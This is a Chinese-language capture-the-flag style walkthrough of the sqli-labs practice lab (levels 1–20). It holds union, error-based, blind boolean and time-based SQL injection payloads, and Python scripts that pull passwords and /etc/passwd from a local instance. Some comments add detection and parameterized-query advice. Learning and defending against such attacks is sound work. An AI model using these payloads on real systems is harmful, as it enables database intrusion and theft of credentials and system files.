?id=1' order by 3;--+ # 爆字段数
?id=-1' union select 1,2,database();--+ # 爆库名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security';--+ # 爆表名
?id=-1' union select 1,2,group_concat(column_name) FROM information_schema.columns where table_schema='security' and table_name='users';--+ # 爆字段
?id=-1' union select 1,2,group_concat(username, " ", password) from users --+ #爆字段内容
?id=-1' or updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ # 爆库名
?id=-1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+ # 爆表名
?id=-1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+ # 爆字段名
?id=-1' or updatexml(1,concat(0x7e,(select group_concat(username, " ", password) from users),0x7e),1)--+ # 爆字段内容
import requests

# Boolean-based blind probe against the local sqli-labs instance (Less-7).
# Each character of the target string is recovered by a binary search over
# the code range 32..127 (about seven requests per character), steered by
# whether the page's success marker "You are in" appears in the response.
# From the defender's side this traffic is very regular: hundreds of GETs to
# the same path whose query string differs only in two integers and carries
# load_file()/substring()/ascii() verbatim — an easy pattern for request-log
# alerting, and the root-cause fix is a parameterized query for `id`.
if __name__ == "__main__":
    # Positions 1..255 of the result string; there is no stop condition, so
    # requests keep going after the real string has ended.
    for i in range(1, 256):
        left = 32    # lower bound of the candidate character code
        right = 127  # upper bound of the candidate character code
        mid = (left + right) // 2
        while left < right:
            # Injected predicate: "is the code of character i greater than mid?".
            # ascii() evaluates only the leftmost character of its argument, so
            # the length argument {i} passed to substring() acts the same as 1.
            # load_file() only succeeds when the DB account holds the FILE
            # privilege and secure_file_priv allows the path — a least-privilege
            # database user is the mitigation for this particular read.
            url = f"http://127.0.0.1:8080/Less-7/?id=1'))and ascii(substring((select load_file('/etc/passwd')),{i},{i}))>{mid} --+"
            # No timeout is set, so a stalled server blocks the script indefinitely.
            response = requests.get(url)
            # Missing success marker => the predicate was false => code <= mid.
            if response.text.find("You are in") == -1:
                right = mid
            else:
                left = mid + 1
            mid = (left + right) // 2
        # On exit left == right, so mid equals the recovered character code.
        print(chr(mid), end="")
接着读取user表。
import requests

# Same boolean-based binary search as the previous script, but the probed
# expression is now the concatenated `password` column of `users` (Less-7).
# Success/failure is again read from the presence of "You are in".
if __name__ == "__main__":
    # Character positions 1..255; the loop does not stop at the string's end.
    for i in range(1, 256):
        left = 32    # lower bound of the candidate character code
        right = 127  # upper bound of the candidate character code
        mid = (left + right) // 2
        while left < right:
            # Predicate: code of character i of the result is greater than mid.
            # ascii() looks only at the leftmost character, so substring()'s
            # length argument {i} is equivalent to 1 here.
            url = f"http://127.0.0.1:8080/Less-7/?id=1'))and ascii(substring((select group_concat(password) from users),{i},{i}))>{mid} --+"
            # No timeout: a hung server blocks this call indefinitely.
            response = requests.get(url)
            # Marker absent => predicate false => narrow the upper half away.
            if response.text.find("You are in") == -1:
                right = mid
            else:
                left = mid + 1
            mid = (left + right) // 2
        # left == right here, so mid is the recovered character code.
        print(chr(mid), end="")
import requests

# Less-8 variant of the boolean-based probe: identical binary search and
# identical "You are in" oracle; only the injection context differs (the
# parameter is closed with a single quote and `and` instead of `'))and`).
if __name__ == "__main__":
    # Character positions 1..255; no early exit when the string ends.
    for i in range(1, 256):
        left = 32    # lower bound of the candidate character code
        right = 127  # upper bound of the candidate character code
        mid = (left + right) // 2
        while left < right:
            # Predicate: code of character i is greater than mid. ascii() reads
            # only the leftmost character, so the {i} length argument behaves as 1.
            url = f"http://127.0.0.1:8080/Less-8/?id=1' and ascii(substring((select group_concat(password) from users),{i},{i}))>{mid} --+"
            # No timeout on the request.
            response = requests.get(url)
            # Marker absent => predicate false.
            if response.text.find("You are in") == -1:
                right = mid
            else:
                left = mid + 1
            mid = (left + right) // 2
        # left == right, so mid is the recovered character code.
        print(chr(mid), end="")
Less-9 -> Less-10
时间盲注
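import requests
import time

# Time-based blind probe for Less-9, where the page no longer differs between
# true and false results. The oracle is response latency: the injected
# if(...) calls sleep(3) when the predicate holds. Only the `iimport` typo in
# the original listing was corrected; the logic is unchanged.
# Defender's note: the tell-tale signs are a burst of requests to one path
# containing sleep()/if() in the query string and a bimodal latency pattern
# (~0 s vs ~3 s); parameterized queries remove the injection entirely.
if __name__ == '__main__':
    # Character positions 1..255; the loop does not stop at the string's end.
    for i in range(1, 256):
        left = 32    # lower bound of the candidate character code
        right = 127  # upper bound of the candidate character code
        mid = (left + right) // 2
        while left < right:
            # Sub-query whose result is read one character at a time.
            payload = "select group_concat(password) from users"
            # Predicate: code of character i is greater than mid; true => sleep(3).
            # ascii() reads only the leftmost character, so the {i} length
            # argument passed to substring() behaves the same as 1.
            url = f"http://127.0.0.1:8080/Less-9/?id=1' and if(ascii(substring(({payload}),{i},{i}))>{mid},sleep(3),1)--+"
            start = time.time()
            # A round-trip longer than 5 s raises requests.exceptions.Timeout,
            # which is not caught here and therefore aborts the script.
            response = requests.get(url, timeout=5)
            end = time.time()
            # Fast response => no sleep() => predicate false => code <= mid.
            if end - start < 3:
                right = mid
            else:
                left = mid + 1
            mid = (left + right) // 2
        # left == right here, so mid is the recovered character code; unlike the
        # earlier scripts this prints one character per line.
        print(chr(mid))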
Less-10
把单引号改成双引号即可。
Less-11 -> Less-14
这关终于有个登录功能了,万能钥匙直接登录。
报错注入数据外带
跟Less-5一样的payload。
Less-12用")闭合。
Less-13用')闭合。
Less-14用"闭合。
Less-15 -> Less-16
报错爆不出来了,只能尝试盲注了。
看了一下源码,原来是不打印报错信息了。
看一下源码
直接单引号闭合盲注完事
import requests
import time

# Time-based blind probe for Less-16's login form. The injection travels in
# the POST body (`uname`), and the latency oracle is wrapped in a try/except
# because, as the write-up notes below, requests sometimes stalled until
# timeout.
if __name__ == '__main__':
    # Character positions 1..255; no early exit when the string ends.
    for i in range(1, 256):
        left = 32    # lower bound of the candidate character code
        right = 127  # upper bound of the candidate character code
        mid = (left + right) // 2
        while left < right:
            url = f"http://127.0.0.1:8080/Less-16/"
            data = {
                # Predicate: code of character i is greater than mid; true => sleep(1).
                # Here substring() is given the length 1 explicitly.
                "uname": f"admin' or if(ascii(substring((select group_concat(password) from users),{i},1))>{mid},sleep(1),1);#",
                "passwd": "1' or 1=1;#"
            }
            try:
                start = time.time()
                # No timeout is passed, so this call can block indefinitely.
                response = requests.request("POST", url=url, data=data)
                end = time.time()
                # A round-trip under 3 s is classified as "predicate false".
                if end - start < 3:
                    right = mid
                else:
                    left = mid + 1
                mid = (left + right) // 2
            # Bare except: any failure at all (network errors, but also
            # KeyboardInterrupt) is treated as "predicate true". mid is not
            # recomputed on this path, so the next iteration re-probes with the
            # same mid value.
            except:
                left = mid + 1
        # left == right on exit, so mid is the recovered character code;
        # printed one character per line.
        print(chr(mid))
Less-16
改成")完事。
这里脚本写得有点问题,延时得特别久直到 timeout,也不懂是啥问题,最后只能用 try 捕捉了。
Less-17
密码更新功能,是update注入。
源码中打印error信息,报错注入一把梭。
uname=admin&passwd=123456' or updatexml(1,concat(0x7e,database(), 0x7e),1);#
Less-18
User-Agent注入,继续报错注入
username: Dumb
password: Dumb
User-Agent: admin' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1
Less-19
Referer注入,和上一题差不多。
username: Dumb
password: Dumb
Referer: admin' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1
Less-20
Cookie注入
登录后修改Cookie
' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) and '1'='1